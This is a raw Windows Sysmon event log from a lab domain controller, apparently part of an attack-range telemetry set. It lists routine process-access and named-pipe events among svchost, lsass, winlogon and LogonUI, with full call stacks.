09:21:44.248{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1200-00000000FD01}484C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+1f3a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055237Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.248{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1200-00000000FD01}484C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1439d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 18141800x80000000000000001055236Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-ConnectPipe2021-09-27 09:21:44.233{5EBD8912-8CC0-6151-0F00-00000000FD01}300\TSVCPIPE-8c67a868-d0aa-4910-80f6-79d88af9fa90C:\Windows\System32\svchost.exe 18141800x80000000000000001055235Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-ConnectPipe2021-09-27 09:21:44.217{5EBD8912-8CC0-6151-0F00-00000000FD01}300\TSVCPIPE-8c67a868-d0aa-4910-80f6-79d88af9fa90C:\Windows\System32\svchost.exe 10341000x80000000000000001055234Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.217{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1200-00000000FD01}484C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+6260e|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+1279|C:\Windows\System32\combase.dll+3b27c|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+39848|C:\Windows\System32\combase.dll+375ad|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+524b9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001055233Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.217{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-0F00-00000000FD01}300C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+625bd|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+1279|C:\Windows\System32\combase.dll+3b27c|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+39848|C:\Windows\System32\combase.dll+375ad|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+524b9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 18141800x80000000000000001055232Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-ConnectPipe2021-09-27 09:21:44.217{5EBD8912-8CC0-6151-0F00-00000000FD01}300\TSVCPIPE-8c67a868-d0aa-4910-80f6-79d88af9fa90C:\Windows\System32\svchost.exe 17141700x80000000000000001055231Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-CreatePipe2021-09-27 09:21:44.217{5EBD8912-8CC0-6151-0F00-00000000FD01}300\TSVCPIPE-8c67a868-d0aa-4910-80f6-79d88af9fa90C:\Windows\System32\svchost.exe 10341000x80000000000000001055230Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.217{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1200-00000000FD01}484C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055229Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.217{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1200-00000000FD01}484C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+7f5d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055228Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.217{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2600-00000000FD01}2944C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055227Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.217{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055226Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.217{5EBD8912-8CC0-6151-0F00-00000000FD01}3002728C:\Windows\System32\svchost.exe{5EBD8912-8D26-6151-8600-00000000FD01}1288C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\termsrv.dll+a1087|c:\windows\system32\termsrv.dll+6a73d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055225Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.217{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1400-00000000FD01}1040C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055224Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.217{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1400-00000000FD01}1040C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055223Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.217{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1400-00000000FD01}1040C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055222Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.217{5EBD8912-8CC0-6151-1600-00000000FD01}12961784C:\Windows\system32\svchost.exe{5EBD8912-8D26-6151-8600-00000000FD01}1288C:\Windows\system32\winlogon.exe0x147aC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\themeservice.dll+3de3|c:\windows\system32\themeservice.dll+26c0|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055221Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.217{5EBD8912-8CC0-6151-1600-00000000FD01}12961336C:\Windows\system32\svchost.exe{5EBD8912-8D26-6151-8600-00000000FD01}1288C:\Windows\system32\winlogon.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055220Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.217{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055219Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.217{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055218Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.217{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055217Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.217{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055216Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.217{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+7f5d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055215Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.217{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8D27-6151-8700-00000000FD01}3724C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d6162|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055214Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.217{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055213Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.217{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8D26-6151-8600-00000000FD01}1288C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+796b|c:\windows\system32\lsm.dll+396a|c:\windows\system32\SYSNTFY.dll+1fc3|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49e78|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055212Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.217{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8D26-6151-8600-00000000FD01}1288C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\SYSNTFY.dll+1ad9|C:\Windows\System32\RPCRT4.dll+48674|C:\Windows\System32\RPCRT4.dll+31850|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055211Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.217{5EBD8912-8CBD-6151-0B00-00000000FD01}6402736C:\Windows\system32\lsass.exe{5EBD8912-8D26-6151-8600-00000000FD01}1288C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\SYSNTFY.dll+1ad9|C:\Windows\System32\RPCRT4.dll+48674|C:\Windows\System32\RPCRT4.dll+31850|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055210Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 